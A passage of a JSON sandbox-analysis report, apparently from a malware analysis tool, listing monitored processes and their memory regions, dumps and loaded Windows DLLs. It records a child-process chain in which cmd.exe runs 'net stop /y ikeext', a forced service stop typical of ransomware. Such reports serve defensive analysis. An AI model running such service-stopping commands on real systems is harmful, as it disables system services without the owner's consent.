"entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_906", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:47.215", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000907-addr_0x0000000000720000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7733247, "entry_point": 0, "filename": null, "id": "region_907", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:00:47.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_908", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:00:47.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 6615039, "entry_point": 0, "filename": null, "id": "region_909", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:00:47.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1936588800, "type": "region", "version": 1 }, "end_va": 1936666623, "entry_point": 1936596287, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_910", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1936588800, "timestamp": "00:00:47.226", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_7", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00000911-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_911", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.237", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_912", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.237", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_913", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000914-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_914", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:47.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_915", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:47.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_916", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_917", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_918", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.240", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000919-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_919", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:47.241", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000920-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_920", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_921", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_922", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_923", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:47.266", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000924-addr_0x0000000000320000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_924", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:47.266", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000925-addr_0x00000000005c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_925", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:00:47.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_926", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:47.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_927", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_928", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_929", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_930", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:47.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_931", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:47.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_932", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:47.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_933", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:47.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_934", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5144575, "entry_point": 0, "filename": null, "id": "region_935", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:47.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_936", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:47.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_937", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:47.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_938", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:47.283", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_939", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:47.283", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000940-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_940", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:47.284", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00000941-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_941", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:47.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7147519, "entry_point": 0, "filename": null, "id": "region_942", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:00:47.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 19791871, "entry_point": 0, "filename": null, "id": "region_943", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:00:47.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 19791872, "type": "region", "version": 1 }, "end_va": 21245951, "entry_point": 0, "filename": null, "id": "region_944", "name": "pagefile_0x00000000012e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19791872, "timestamp": "00:00:47.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21299200, "type": "region", "version": 1 }, "end_va": 24244223, "entry_point": 21299200, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_945", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21299200, "timestamp": "00:00:47.305", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "net stop /y ikeext", "filename": "c:\\windows\\system32\\net.exe", "id": "proc_8", "image_name": "net.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00000946-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_946", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_947", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_948", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.317", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00000949-addr_0x0000000000190000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:47.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 14614528, "type": "region", "version": 1 }, "end_va": 14712831, "entry_point": 14614528, "filename": "\\Windows\\System32\\net.exe", "id": "region_950", "name": "net.exe", "norm_filename": "c:\\windows\\system32\\net.exe", "region_type": "memory_mapped_file", "start_va": 14614528, "timestamp": "00:00:47.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_951", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_952", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_953", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00000954-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_954", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00000955-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_955", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_956", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_957", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_958", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:47.344", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00000959-addr_0x0000000000150000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_959", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:47.345", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00000960-addr_0x0000000000320000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_960", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:47.345", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1829699584, "type": "region", "version": 1 }, "end_va": 1829752831, "entry_point": 1829699584, "filename": "\\Windows\\System32\\browcli.dll", "id": "region_961", "name": "browcli.dll", "norm_filename": "c:\\windows\\system32\\browcli.dll", "region_type": "memory_mapped_file", "start_va": 1829699584, "timestamp": "00:00:47.345", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1910308864, "type": 